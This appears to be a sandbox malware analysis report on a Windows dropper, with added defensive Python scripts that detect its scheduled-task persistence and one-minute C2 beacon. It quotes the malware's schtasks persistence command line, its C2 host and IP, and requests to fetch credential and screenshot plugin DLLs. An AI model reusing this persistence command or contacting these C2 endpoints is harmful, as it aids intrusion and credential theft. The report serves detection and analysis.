Overview

Static analysis: score 10

Behavioral analysis per sample and platform (score, sample, platform). This report is the windows10-2004-x64 run of 2a3b92f618...6b.exe:

  score  sample                 platform
  10     0468127a19...1f.exe    windows7-x64
   3     0468127a19...1f.exe    windows10-2004-x64
   3     2a3b92f618...6b.exe    windows7-x64
  10     2a3b92f618...6b.exe    windows10-2004-x64
  10     b154ac015c...cf.exe    windows7-x64
   8     b154ac015c...cf.exe    windows10-2004-x64
   8     b96bd6bbf0...69.exe    windows7-x64
  10     b96bd6bbf0...69.exe    windows10-2004-x64
  10     bb8e52face...3e.dll    windows7-x64
   8     bb8e52face...3e.dll    windows10-2004-x64
   8     ca467e3323...a4.dll    windows7-x64
  10     ca467e3323...a4.dll    windows10-2004-x64
   8     e93d6f4ce3...ad.exe    windows7-x64
  10     e93d6f4ce3...ad.exe    windows10-2004-x64
  10     fa5390bbcc...f6.exe    windows7-x64
  10     fa5390bbcc...f6.exe    windows10-2004-x64
Analysis (score 10)

  max time kernel:   137s
  max time network:  122s
  platform:          windows10-2004_x64
  resource:          win10v2004-20240802-en
  resource tags:     arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
  submitted:         13/09/2024, 15:23 UTC
Behavioral tasks

  task          sample                                  resource
  behavioral1   0468127a19daf4c7bc41015c5640fe1f.exe    win7-20240903-en
  behavioral2   0468127a19daf4c7bc41015c5640fe1f.exe    win10v2004-20240802-en
  behavioral3   2a3b92f6180367306d750e59c9b6446b.exe    win7-20240903-en
  behavioral4   2a3b92f6180367306d750e59c9b6446b.exe    win10v2004-20240802-en   (this report)
  behavioral5   b154ac015c0d1d6250032f63c749f9cf.exe    win7-20240903-en
  behavioral6   b154ac015c0d1d6250032f63c749f9cf.exe    win10v2004-20240802-en
  behavioral7   b96bd6bbf0e3f4f98b606a2ab5db4a69.exe    win7-20240708-en
  behavioral8   b96bd6bbf0e3f4f98b606a2ab5db4a69.exe    win10v2004-20240802-en
  behavioral9   bb8e52face5b076cc890bbfaaf4bb73e.dll    win7-20240903-en
  behavioral10  bb8e52face5b076cc890bbfaaf4bb73e.dll    win10v2004-20240802-en
  behavioral11  ca467e332368cbae652245faa4978aa4.dll    win7-20240903-en
  behavioral12  ca467e332368cbae652245faa4978aa4.dll    win10v2004-20240802-en
  behavioral13  e93d6f4ce34d4f594d7aed76cfde0fad.exe    win7-20240903-en
  behavioral14  e93d6f4ce34d4f594d7aed76cfde0fad.exe    win10v2004-20240802-en
  behavioral15  fa5390bbcc4ab768dd81f31eac0950f6.exe    win7-20240704-en
General

  Target:  2a3b92f6180367306d750e59c9b6446b.exe
  Size:    178KB
  MD5:     2a3b92f6180367306d750e59c9b6446b
  SHA1:    95fb90137086c731b84db0a1ce3f0d74d6931534
  SHA256:  18fd6b193be1d5416a3188f5d9e4047cca719fa067d7d0169cf2df5c7fed54c0
  SHA512:  c87cda81a0133db40be68e0dd94e39f986f3a32faa54d4a1420e071407c94fffdfef6d6ec8f3fdb893115d84ae12824436cf5785fdb2c77dafb96be858b3b5d0
  SSDEEP:  3072:GK0YqBB9mUQ13o2vM2tD81JI0MBkuomh87I3pBSpvVFLm:GnrB9mUWdk26DIquom2dN

Malware Config

  No configuration was extracted for this task.
Signatures

Checks computer location settings (2 TTPs, 2 IoCs)
  Looks up the country code configured in the registry, likely a geofence.
    action             key                                                                                                        process
    Key value queried  \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation    2a3b92f6180367306d750e59c9b6446b.exe
    Key value queried  \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation    gbudn.exe
  Both the dropper and the dropped binary perform the lookup, so the location check is not limited to the initial infection stage.

Executes dropped EXE (4 IoCs)
    pid   process
    3380  gbudn.exe
    1216  gbudn.exe
    5072  gbudn.exe
    4460  gbudn.exe

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). No IoC is recorded for this signature.

System Location Discovery: System Language Discovery (1 TTP, 3 IoCs)
  Attempts to gather information about the system language of the victim in order to infer the geographical location of the host.
    action      key                                                          process
    Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  2a3b92f6180367306d750e59c9b6446b.exe
    Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  gbudn.exe
    Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  schtasks.exe
  The schtasks.exe row comes from the legitimate Windows binary the sample launched, not from sample code; only the first two rows should be attributed to the malware.

Scheduled Task/Job: Scheduled Task (1 TTP, 1 IoC)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
    pid   process
    1408  schtasks.exe
  The task created here (full command line in the process tree) re-runs C:\ProgramData\3101f8f780\gbudn.exe every minute.

Suspicious use of WriteProcessMemory (6 IoCs)
    description                     pid   process                                 procid_target
    PID 2504 wrote to memory of 3380  2504  2a3b92f6180367306d750e59c9b6446b.exe    84
    PID 2504 wrote to memory of 3380  2504  2a3b92f6180367306d750e59c9b6446b.exe    84
    PID 2504 wrote to memory of 3380  2504  2a3b92f6180367306d750e59c9b6446b.exe    84
    PID 3380 wrote to memory of 1408  3380  gbudn.exe                               85
    PID 3380 wrote to memory of 1408  3380  gbudn.exe                               85
    PID 3380 wrote to memory of 1408  3380  gbudn.exe                               85
  Every target is the child the writing process had just started (2504 -> 3380 gbudn.exe, 3380 -> 1408 schtasks.exe), so these writes are consistent with ordinary process creation rather than injection into an unrelated process. procid_target (84, 85) is the sandbox's internal id for the target process, not a Windows PID.
Processes

  PID 2504  "C:\Users\Admin\AppData\Local\Temp\2a3b92f6180367306d750e59c9b6446b.exe"
            Checks computer location settings; System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
    PID 3380  "C:\ProgramData\3101f8f780\gbudn.exe"
              Checks computer location settings; Executes dropped EXE; System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
      PID 1408  "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gbudn.exe /TR "C:\ProgramData\3101f8f780\gbudn.exe" /F
                image loaded: C:\Windows\SysWOW64\schtasks.exe
                System Location Discovery: System Language Discovery; Scheduled Task/Job: Scheduled Task

  PID 1216  C:\ProgramData\3101f8f780\gbudn.exe    Executes dropped EXE
  PID 5072  C:\ProgramData\3101f8f780\gbudn.exe    Executes dropped EXE
  PID 4460  C:\ProgramData\3101f8f780\gbudn.exe    Executes dropped EXE

Notes on the tree:
  The sample drops gbudn.exe into C:\ProgramData\3101f8f780\ and runs it; the dropped binary registers a scheduled task named gbudn.exe that starts it every minute (/SC MINUTE /MO 1) and overwrites any existing task of that name (/F). A persistence mechanism that re-launches every 60 seconds is noisy and easy to spot: one schtasks /Create with /SC MINUTE from a process in ProgramData or a user-writable path is a strong detection candidate on its own.
  The command line names C:\Windows\System32\schtasks.exe but the image actually loaded is C:\Windows\SysWOW64\schtasks.exe. That is WoW64 file-system redirection, which tells us gbudn.exe is a 32-bit process (consistent with the arch:x86 resource tag).
  PIDs 1216, 5072 and 4460 have no parent in the tree because the Task Scheduler service, not the dropper, started them; their presence within the 137 s run is consistent with the task firing on its one-minute schedule.
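The checks a triage script would run over this tree, as an added example that is not part of the sandbox report or its export format. The process and registry records are constructed by hand from the PIDs, image paths, command lines and registry IoCs printed above; the field names and every function are this script's own, and it parses the real schtasks command line rather than matching it as a string so that /SC, /MO, /TN and /TR survive different switch orders and quoting.

```python
"""Triage of the process tree above: an added example, not part of the
sandbox report. The event records are constructed by hand from the PIDs,
image paths, command lines and registry IoCs printed in the report; the
field names and every function here are this script's own invention."""
import re
from ntpath import basename

DROPPED = r"C:\ProgramData\3101f8f780\gbudn.exe"
PROCESS_EVENTS = [  # constructed from the "Processes" tree in the report
    {"pid": 2504, "ppid": None,
     "image": r"C:\Users\Admin\AppData\Local\Temp\2a3b92f6180367306d750e59c9b6446b.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Local\Temp\2a3b92f6180367306d750e59c9b6446b.exe"'},
    {"pid": 3380, "ppid": 2504, "image": DROPPED, "cmdline": '"' + DROPPED + '"'},
    {"pid": 1408, "ppid": 3380, "image": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmdline": r'"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 '
                r'/TN gbudn.exe /TR "C:\ProgramData\3101f8f780\gbudn.exe" /F'},
    # Parentless launches: the Task Scheduler service started these, not the dropper.
    {"pid": 1216, "ppid": None, "image": DROPPED, "cmdline": DROPPED},
    {"pid": 5072, "ppid": None, "image": DROPPED, "cmdline": DROPPED},
    {"pid": 4460, "ppid": None, "image": DROPPED, "cmdline": DROPPED},
]
GEO_KEY = (r"\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000"
           r"\Control Panel\International\Geo\Nation")
NLS_KEY = r"\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language"
REGISTRY_EVENTS = [  # constructed from the two location-discovery signatures
    {"pid": 2504, "key": GEO_KEY}, {"pid": 3380, "key": GEO_KEY},
    {"pid": 2504, "key": NLS_KEY}, {"pid": 3380, "key": NLS_KEY}, {"pid": 1408, "key": NLS_KEY},
]
SCHEDULE_UNIT_SECONDS = {"MINUTE": 60, "HOURLY": 3600, "DAILY": 86400}
LOCATION_KEY_SUFFIXES = (r"\International\Geo\Nation", r"\NLS\Language")


def tokenize(cmdline):
    """Split a Windows command line, keeping double-quoted arguments whole."""
    return [quoted or bare for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', cmdline)]


def parse_schtasks(cmdline):
    """Map each /switch of a schtasks.exe command line to its value
    (True for valueless switches such as /Create and /F)."""
    tokens, switches, i = tokenize(cmdline), {}, 1  # token 0 is the image
    while i < len(tokens):
        if tokens[i].startswith("/"):
            name = tokens[i][1:].upper()
            has_value = i + 1 < len(tokens) and not tokens[i + 1].startswith("/")
            switches[name] = tokens[i + 1] if has_value else True
            i += 2 if has_value else 1
        else:
            i += 1
    return switches


def schedule_seconds(switches):
    """Repeat period implied by /SC and /MO, or None for one-shot schedules."""
    unit = SCHEDULE_UNIT_SECONDS.get(str(switches.get("SC", "")).upper())
    return unit * int(switches.get("MO", 1)) if unit else None


def find_task_persistence(events):
    """Describe every schtasks /Create: who created it, what it runs, how often."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if basename(e["image"]).lower() != "schtasks.exe":
            continue
        sw = parse_schtasks(e["cmdline"])
        if "CREATE" not in sw:
            continue
        parent, target = by_pid.get(e["ppid"]), sw.get("TR", "")
        findings.append({
            "task": sw.get("TN"), "target": target,
            "period_s": schedule_seconds(sw), "forced": "F" in sw,
            # the creating process registers itself: self-persistence
            "self_persist": parent is not None and parent["image"].lower() == target.lower(),
            # cmdline says System32 but SysWOW64 was loaded: WoW64 redirection,
            # so the parent is a 32-bit process
            "wow64_redirected": "\\system32\\" in e["cmdline"].lower()
                                and "\\syswow64\\" in e["image"].lower(),
        })
    return findings


def dropped_from_temp(events):
    """PIDs of binaries under C:\\ProgramData started by a parent in a Temp directory."""
    by_pid = {e["pid"]: e for e in events}
    return [e["pid"] for e in events
            if e["image"].lower().startswith("c:\\programdata\\")
            and e["ppid"] in by_pid and "\\temp\\" in by_pid[e["ppid"]]["image"].lower()]


def task_launches(events, target):
    """Parentless starts of the task target: the Task Scheduler service is the
    real parent, so the sandbox shows them at the top of the tree."""
    return sum(1 for e in events if e["ppid"] is None and e["image"].lower() == target.lower())


def location_checks(reg_events, proc_events):
    """Location/language registry reads per PID, ignoring Windows' own binaries
    (schtasks.exe opening NLS\\Language is ordinary locale loading, not malware)."""
    image = {e["pid"]: e["image"].lower() for e in proc_events}
    out = {}
    for r in reg_events:
        suffix = next((s for s in LOCATION_KEY_SUFFIXES if r["key"].endswith(s)), None)
        if suffix is None or image.get(r["pid"], "").startswith("c:\\windows\\"):
            continue
        out.setdefault(r["pid"], []).append(suffix.lstrip("\\"))
    return out


if __name__ == "__main__":
    for f in find_task_persistence(PROCESS_EVENTS):
        print("scheduled task %(task)s runs %(target)s every %(period_s)ss "
              "(self-persist=%(self_persist)s, wow64=%(wow64_redirected)s)" % f)
    print("dropped-from-Temp PIDs:", dropped_from_temp(PROCESS_EVENTS))
    print("task firings seen:", task_launches(PROCESS_EVENTS, DROPPED))
    print("location checks by PID:", location_checks(REGISTRY_EVENTS, PROCESS_EVENTS))
```

The same functions run unchanged over a Sysmon or EDR export once its process-create and registry events are mapped onto the pid/ppid/image/cmdline and pid/key fields used here; the value of parsing the command line is that a variant which reorders the switches or schedules every two minutes (/MO 2) is still caught by the period check rather than by an exact-string match.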
Network

Sample traffic, all to mynexa.io (188.40.187.155) over plain HTTP on port 80:

  DNS  8.8.8.8:53   mynexa.io  IN A  ->  188.40.187.155

  15:23:44  POST /hfv23svj2/index.php HTTP/1.1          ->  404 Not Found
            Host: mynexa.io
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 83
            Cache-Control: no-cache
  15:23:44  GET /hfv23svj2/plugins/cred.dll HTTP/1.1    ->  404 Not Found
            Host: mynexa.io
  15:23:55  GET /hfv23svj2/plugins/scr.dll HTTP/1.1     ->  404 Not Found
            Host: mynexa.io
  15:24:45  POST /hfv23svj2/index.php HTTP/1.1          ->  404 Not Found
            (same headers as the first POST, Content-Length: 83)
  15:25:45  POST /hfv23svj2/index.php HTTP/1.1          ->  404 Not Found
            (same headers as the first POST, Content-Length: 83)

  Times are the server Date headers (Fri, 13 Sep 2024, GMT). Every response also carried Transfer-Encoding: chunked, Connection: keep-alive and Keep-Alive: timeout=20. The report does not show the POST bodies; because the traffic is unencrypted, a full pcap would.

  Reading: the POST to /hfv23svj2/index.php with a fixed 83-byte form body is the check-in, repeated at roughly 60 s intervals (15:23:44, 15:24:45, 15:25:45), which lines up with the one-minute scheduled task. The two GETs for plugins/cred.dll and plugins/scr.dll are attempts to fetch additional modules. The server answered 404 to everything, so no tasking or plugin was delivered during this run; whether the panel was offline or deliberately rejected this client cannot be determined from the capture. The reverse lookup of 188.40.187.155 resolves to static.155.187.40.188.clients.your-server.de (Hetzner hosting).

Background traffic, attributable to the OS or the sandbox rather than to the sample:

  DNS  8.8.8.8:53   fe3cr.delivery.mp.microsoft.com  IN A  ->  CNAME fe3.delivery.mp.microsoft.com  ->  CNAME glb.cws.prod.dcat.dsp.trafficmanager.net  ->  A 20.242.39.171   (Windows Update delivery)

  PTR lookups via 8.8.8.8:53 (no answer unless shown; the dotted names below are the report's garbled answers with the dots restored):
    196.249.167.52.in-addr.arpa
    155.187.40.188.in-addr.arpa   ->  static.155.187.40.188.clients.your-server.de   (the C2 address)
    134.32.126.40.in-addr.arpa
    95.221.229.192.in-addr.arpa
    133.211.185.52.in-addr.arpa
    228.249.119.40.in-addr.arpa
    103.169.127.40.in-addr.arpa
    171.39.242.20.in-addr.arpa
    44.56.20.217.in-addr.arpa
    81.144.22.2.in-addr.arpa      ->  a2-22-144-81.deploy.static.akamaitechnologies.com   (queried twice, answered once)
    21.236.111.52.in-addr.arpa

Flows (bytes sent / bytes received / packets sent / packets received):

  mynexa.io:80   554 B  / 418 B  /  7 /  6   POST http://mynexa.io/hfv23svj2/index.php -> 404
  mynexa.io:80   1.3kB  / 915 B  / 15 / 10   GET http://mynexa.io/hfv23svj2/plugins/cred.dll -> 404; GET http://mynexa.io/hfv23svj2/plugins/scr.dll -> 404; POST http://mynexa.io/hfv23svj2/index.php -> 404
  mynexa.io:80   462 B  / 338 B  /  5 /  4   POST http://mynexa.io/hfv23svj2/index.php -> 404
  8.8.8.8:53      73 B  / 147 B  /  1 /  1   PTR 196.249.167.52.in-addr.arpa
  8.8.8.8:53      55 B  /  71 B  /  1 /  1   A mynexa.io -> 188.40.187.155
  8.8.8.8:53     150 B  / 296 B  /  2 /  2   PTR 155.187.40.188.in-addr.arpa; A fe3cr.delivery.mp.microsoft.com -> 20.242.39.171
  8.8.8.8:53      72 B  / 158 B  /  1 /  1   PTR 134.32.126.40.in-addr.arpa
  8.8.8.8:53      73 B  / 144 B  /  1 /  1   PTR 95.221.229.192.in-addr.arpa
  8.8.8.8:53      73 B  / 147 B  /  1 /  1   PTR 133.211.185.52.in-addr.arpa
  8.8.8.8:53      73 B  / 159 B  /  1 /  1   PTR 228.249.119.40.in-addr.arpa
  8.8.8.8:53      73 B  / 147 B  /  1 /  1   PTR 103.169.127.40.in-addr.arpa
  8.8.8.8:53      72 B  / 158 B  /  1 /  1   PTR 171.39.242.20.in-addr.arpa
  8.8.8.8:53      71 B  / 131 B  /  1 /  1   PTR 44.56.20.217.in-addr.arpa
  8.8.8.8:53     140 B  / 133 B  /  2 /  1   PTR 81.144.22.2.in-addr.arpa (x2)
  8.8.8.8:53      72 B  / 158 B  /  1 /  1   PTR 21.236.111.52.in-addr.arpa

  The three HTTP flows show the check-ins were made on separate TCP connections, one per launch of the dropped binary, rather than over a single long-lived session.
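How the beacon reading above is derived from the captured requests, as an added example that is not part of the sandbox report. The records are transcribed by hand from the request/response pairs printed above (server Date header, method, path, Content-Length, status); the 60-second task period is taken from the schtasks line in the process tree, and every function and field name is this script's own. The profiling is general: it picks the most repeated request, measures its period and body size, and checks whether that period matches the persistence mechanism, so it works on any capture shaped like this one, not only this sample.

```python
"""Beacon profiling of the HTTP traffic above: an added example, not part of
the sandbox report. Records are transcribed by hand from the report; all
function and field names are this script's own."""
import os
from collections import defaultdict
from email.utils import parsedate_to_datetime

HTTP_RECORDS = [  # (response Date header, method, path, Content-Length, status)
    ("Fri, 13 Sep 2024 15:23:44 GMT", "POST", "/hfv23svj2/index.php", 83, 404),
    ("Fri, 13 Sep 2024 15:23:44 GMT", "GET", "/hfv23svj2/plugins/cred.dll", None, 404),
    ("Fri, 13 Sep 2024 15:23:55 GMT", "GET", "/hfv23svj2/plugins/scr.dll", None, 404),
    ("Fri, 13 Sep 2024 15:24:45 GMT", "POST", "/hfv23svj2/index.php", 83, 404),
    ("Fri, 13 Sep 2024 15:25:45 GMT", "POST", "/hfv23svj2/index.php", 83, 404),
]
C2_HOST = "mynexa.io"        # Host header in the capture
C2_IP = "188.40.187.155"     # A record in the capture
TASK_PERIOD_S = 60           # /SC MINUTE /MO 1 from the process tree


def group_requests(records):
    """Group requests by (method, path); a beacon is the same request repeated."""
    groups = defaultdict(list)
    for date, method, path, length, status in records:
        groups[(method, path)].append((parsedate_to_datetime(date), length, status))
    return groups


def beacon_profile(records, max_jitter_s=5):
    """Take the most repeated request and measure its period and body size.
    Returns None when nothing repeats."""
    groups = group_requests(records)
    (method, path), hits = max(groups.items(), key=lambda kv: len(kv[1]))
    if len(hits) < 2:
        return None
    times = sorted(t for t, _, _ in hits)
    intervals = [int((b - a).total_seconds()) for a, b in zip(times, times[1:])]
    period = sorted(intervals)[(len(intervals) - 1) // 2]  # lower median
    lengths = {length for _, length, _ in hits}
    return {
        "method": method, "path": path, "count": len(hits),
        "intervals_s": intervals, "period_s": period,
        # a constant body size means a fixed field set (ids, versions), not user data
        "fixed_body_len": lengths.pop() if len(lengths) == 1 else None,
        "periodic": all(abs(i - period) <= max_jitter_s for i in intervals),
    }


def matches_task_schedule(profile, task_period_s=TASK_PERIOD_S, tolerance_s=5):
    """Tie the network period back to the persistence mechanism in the tree."""
    return profile is not None and abs(profile["period_s"] - task_period_s) <= tolerance_s


def module_fetches(records):
    """Extra components the client tried to pull: DLLs under a /plugins/ path."""
    return [path for _, method, path, _, _ in records
            if method == "GET" and "/plugins/" in path and path.lower().endswith(".dll")]


def server_delivered(records):
    """True if any response was a success; all-404 means no tasking, no plugins."""
    return any(status < 400 for *_, status in records)


def indicators(records, host, ip):
    """Pivotable IOCs derived from the capture: host, IP, URI paths and their common prefix."""
    paths = sorted({path for _, _, path, _, _ in records})
    return {"host": host, "ip": ip, "uri_paths": paths,
            "uri_prefix": os.path.commonprefix(paths)}


if __name__ == "__main__":
    profile = beacon_profile(HTTP_RECORDS)
    print("beacon:", profile)
    print("period matches scheduled task:", matches_task_schedule(profile))
    print("module fetches:", module_fetches(HTTP_RECORDS))
    print("server delivered anything:", server_delivered(HTTP_RECORDS))
    print("indicators:", indicators(HTTP_RECORDS, C2_HOST, C2_IP))
```

The jitter tolerance is deliberately small because the period here is produced by the Task Scheduler rather than by a sleep loop inside the bot; a beacon that randomises its sleep would need a wider tolerance or a distribution test instead of a fixed-window check.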
MITRE ATT&CK Enterprise v15

  Techniques named by the signatures above, with their ATT&CK ids:
    T1614      System Location Discovery                       (Checks computer location settings)
    T1614.001  System Location Discovery: System Language Discovery
    T1053.005  Scheduled Task/Job: Scheduled Task              (schtasks /Create)
    T1120      Peripheral Device Discovery                     (Enumerates physical storage devices)
Downloads

  Only the submitted sample is listed (178KB; MD5 2a3b92f6180367306d750e59c9b6446b, SHA1 95fb90137086c731b84db0a1ce3f0d74d6931534, SHA256 18fd6b193be1d5416a3188f5d9e4047cca719fa067d7d0169cf2df5c7fed54c0, SHA512 c87cda81a0133db40be68e0dd94e39f986f3a32faa54d4a1420e071407c94fffdfef6d6ec8f3fdb893115d84ae12824436cf5785fdb2c77dafb96be858b3b5d0). The dropped C:\ProgramData\3101f8f780\gbudn.exe is not offered for download on this page.